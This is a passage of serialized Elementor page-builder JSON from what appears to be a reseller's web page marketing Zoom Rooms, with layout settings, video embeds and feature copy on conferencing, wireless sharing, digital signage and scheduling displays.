sharing<\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6457ddc\",\"elType\":\"section\",\"settings\":{\"structure\":\"33\"},\"elements\":[{\"id\":\"bdc71a2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3abc915\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1901198\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/yRQGXlJS-xI\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"bcb7227\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"66635b2\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[{\"id\":\"1e75488\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5affd82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Simple, flexible set up<\\/h3><p><span style=\\\"font-size: 0.875rem;\\\">Build the room you need with the hardware you want on top on Zoom\\u2019s cloud-based platform.<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d999cea\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6757f8b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Modern capabilities<\\/h3><p>Deploy scalable conferencing solutions that help you address the problems of today and opportunities of tomorrow.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2b51dbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ff854f8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Happy, productive users<\\/h3><p>We focus on delivering compelling, easy-to-use technology, so that you and your teams can focus on the task at hand.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"faaa0fe\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/Zoom-Conference-Room-Solutions_page2_image7.jpg\",\"id\":3048},\"background_position\":\"center center\",\"background_attachment\":\"scroll\",\"background_size\":\"cover\"},\"elements\":[{\"id\":\"886f41b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"a8a224a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">HD video and audio<\\/h4><p class=\\\"mt-1 mb-5\\\">Bring high quality video, audio, and web conferencing to your existing rooms.<\\/p>\",\"text_color\":\"#000000\",\"_background_hover_background\":\"classic\",\"_background_hover_color\":\"#eaeaea\",\"_background_hover_transition\":{\"unit\":\"px\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"412feda\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">Wireless sharing<\\/h4><p class=\\\"mt-1 mb-5\\\">Cut the cords, cables, and dongles -- present content wirelessly from your laptop or mobile device.<\\/p>\",\"text_color\":\"#000000\",\"_background_hover_background\":\"classic\",\"_background_hover_color\":\"#eaeaea\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3d2b744\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">Interoperability with any video system<\\/h4><p class=\\\"mt-1 mb-5\\\">Communicate with existing SIP or H.323 systems<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a34735d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[],\"isInner\":false},{\"id\":\"ab89310\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"fcc54ee\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">Meet with anyone<\\/h4><p class=\\\"mt-1 mb-5\\\">Include remote participants on desktop, mobile, or other conference room systems.<\\/p>\",\"text_color\":\"#000000\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3c1657b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">One touch to start meetings<\\/h4><p class=\\\"mt-1 mb-5\\\">Leveraging native integrations with Cisco and Polycom, bring one-touch to start a meeting through your calendaring system.<\\/p>\",\"text_color\":\"#000000\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"406125c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">Centralized management<\\/h4><p class=\\\"mt-1 mb-5\\\">Get the overview status and management of deployed conference rooms in a single admin console<\\/p>\",\"text_color\":\"#000000\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0518cb7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"92a3de4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c7f20ea\",\"elType\":\"widget\",\"settings\":{\"title\":\"Zoom Rooms includes the following value-added services at no additional cost.\",\"header_size\":\"h3\",\"align\":\"center\",\"title_color\":\"#000000\",\"_padding\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0e401c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"428f120\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a4857de\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Digital Signage<\\/h3><p>Digital Signage gives organizations the power to manage corporate communications, internal marketing, and more across multiple offices and departments from the Zoom Admin Portal.<\\/p><ul><li>Leverage room displays when not in use<\\/li><li>Manage displays at scale or individually<\\/li><li>Unlimited amount of displays supported (both in and out of conference rooms)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b6e2b30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8217db2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Scheduling Display<\\/h3><p><span style=\\\"font-size: 0.875rem;\\\">End scheduling headaches with a beautiful display that provides room availability information and capabilities to book a meeting for any available time of that day.<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e1221c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cf0ae88\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Make interactive collaboration easy with touch screens<\\/h3><p>Power up your team with Zoom meetings on collaborative touch screens 